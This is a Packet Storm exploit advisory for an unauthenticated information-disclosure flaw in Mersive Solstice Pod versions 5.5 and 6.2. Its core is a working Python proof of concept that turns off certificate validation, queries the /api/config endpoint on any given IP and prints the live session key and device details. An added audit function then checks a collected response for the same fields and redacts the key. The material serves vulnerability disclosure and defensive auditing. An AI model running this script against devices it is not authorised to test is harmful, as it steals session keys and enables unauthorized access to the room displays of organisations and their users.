Solstice Pod 5.5 / 6.2 Information Disclosure

31 Mar 2025 00:00:00 | Reported by The Baldwin School Ethical Hackers | Type: packetstorm | Source: packetstorm.news

An unauthenticated API endpoint in Solstice Pod versions 5.5 and 6.2 exposes sensitive data.

Code

    # Exploit Title: Solstice Pod API Session Key Extraction via API Endpoint
    # Google Dork: N/A
    # Date: 1/17/2025
    # Exploit Author: The Baldwin School Ethical Hackers
    # Vendor Homepage: https://www.mersive.com/
    # Software Link: https://documentation.mersive.com/en/solstice/about-solstice.html
    # Versions: 5.5, 6.2
    # Tested On: Windows 10, macOS, Linux 
    # CVE: N/A
    # Description: This exploit takes advantage of an unauthenticated API endpoint (`/api/config`) on the Solstice Pod, which exposes sensitive information such as the session key, server version, product details, and display name. By accessing this endpoint without authentication, attackers can extract live session information.
    # Notes: This script extracts the session key, server version, product name, product variant, and display name from the Solstice Pod API. It does not require authentication to interact with the vulnerable `/api/config` endpoint.
    # Impact: Unauthorized users can extract session-related information without authentication. The exposed data could potentially lead to further exploitation or unauthorized access.
    
    #!/usr/bin/env python3
    
    import requests
    import ssl
    from requests.adapters import HTTPAdapter
    from urllib3.poolmanager import PoolManager
    
    # Adapter that restricts the cipher list and disables certificate and hostname verification
    class SSLAdapter(HTTPAdapter):
        def __init__(self, ssl_context=None, **kwargs):
            # Set the default context if none is provided
            if ssl_context is None:
                ssl_context = ssl.create_default_context()
                ssl_context.set_ciphers('TLSv1.2')  # Restrict to TLSv1.2 cipher suites (this selects ciphers; it does not pin the protocol version)
                ssl_context.check_hostname = False  # Disable hostname checking
                ssl_context.verify_mode = ssl.CERT_NONE  # Disable certificate validation
            self.ssl_context = ssl_context
            super().__init__(**kwargs)
    
        def init_poolmanager(self, *args, **kwargs):
            kwargs['ssl_context'] = self.ssl_context
            return super().init_poolmanager(*args, **kwargs)
    
    # Prompt the user for the IP address
    ip_address = input("Please enter the IP address: ")
    
    # Format the URL with the provided IP address
    url = f"https://{ip_address}:8443/api/config"
    
    # Create a session and mount the adapter
    session = requests.Session()
    adapter = SSLAdapter()
    session.mount('https://', adapter)
    
    # Send the request to the IP address
    response = session.get(url, verify=False)  # verify=False to ignore certificate warnings
    
    if response.status_code == 200:
        # Parse the JSON response
        data = response.json()
    
        # Extract the sessionKey, serverVersion, productName, productVariant, and displayName values from the response
        session_key = data.get("m_authenticationCuration", {}).get("sessionKey")
        server_version = data.get("m_serverVersion")
        product_name = data.get("m_productName")
        product_variant = data.get("m_productVariant")
        display_name = data.get("m_displayInformation", {}).get("m_displayName")
    
        # Print the extracted values
        if session_key:
            print(f"Session Key: {session_key}")
        else:
            print("sessionKey not found in the response.")
    
        if server_version:
            print(f"Server Version: {server_version}")
        else:
            print("serverVersion not found in the response.")
    
        if product_name:
            print(f"Product Name: {product_name}")
        else:
            print("productName not found in the response.")
    
        if product_variant:
            print(f"Product Variant: {product_variant}")
        else:
            print("productVariant not found in the response.")
    
        if display_name:
            print(f"Display Name: {display_name}")
        else:
            print("displayName not found in the response.")
    else:
        print(f"Failed to retrieve data. HTTP Status code: {response.status_code}")
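
A defender-side check for the exposure described above, added here as an example and not part of the original PoC or the vendor's code: given a response body already collected from `/api/config` during an authorized audit, it reports which of the fields named in the PoC are exposed and replaces the session key with a short digest so the key never reaches logs or tickets. The sample bodies, the report layout and the function names are assumptions constructed for illustration.

```python
import hashlib
import json

# Field paths are the ones the PoC on this page reads; the report layout is an assumption.
SENSITIVE_PATHS = {
    "sessionKey": ("m_authenticationCuration", "sessionKey"),
    "serverVersion": ("m_serverVersion",),
    "productName": ("m_productName",),
    "productVariant": ("m_productVariant",),
    "displayName": ("m_displayInformation", "m_displayName"),
}

def _lookup(doc, path):
    node = doc
    for key in path:
        if not isinstance(node, dict) or key not in node:
            return None  # missing hop, or a non-object where an object was expected
        node = node[key]
    return node

def audit_config_body(body):
    """Return {field: value safe to log} for each sensitive field the body exposes."""
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return {}  # not JSON, e.g. a login page or error returned after remediation
    findings = {}
    for name, path in SENSITIVE_PATHS.items():
        value = _lookup(doc, path)
        if value in (None, ""):
            continue
        if name == "sessionKey":
            # Never record the key itself; a short digest still lets two audits be compared.
            digest = hashlib.sha256(str(value).encode()).hexdigest()[:12]
            findings[name] = f"<redacted sha256:{digest}>"
        else:
            findings[name] = str(value)
    return findings

# Constructed sample bodies (not captured from a real device).
EXPOSED = json.dumps({
    "m_authenticationCuration": {"sessionKey": "CONSTRUCTED-KEY"},
    "m_serverVersion": "5.5", "m_productName": "ExampleProduct",
    "m_productVariant": "ExampleVariant",
    "m_displayInformation": {"m_displayName": "Example Room"},
})
REMEDIATED = json.dumps({"error": "authentication required"})

if __name__ == "__main__":
    print(audit_config_body(EXPOSED), audit_config_body(REMEDIATED))
```

An empty result means none of the PoC's fields were readable in that body; a non-empty one lists what an unauthenticated client on the same network could learn.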

Vulners AI Score: 7.1 (High risk)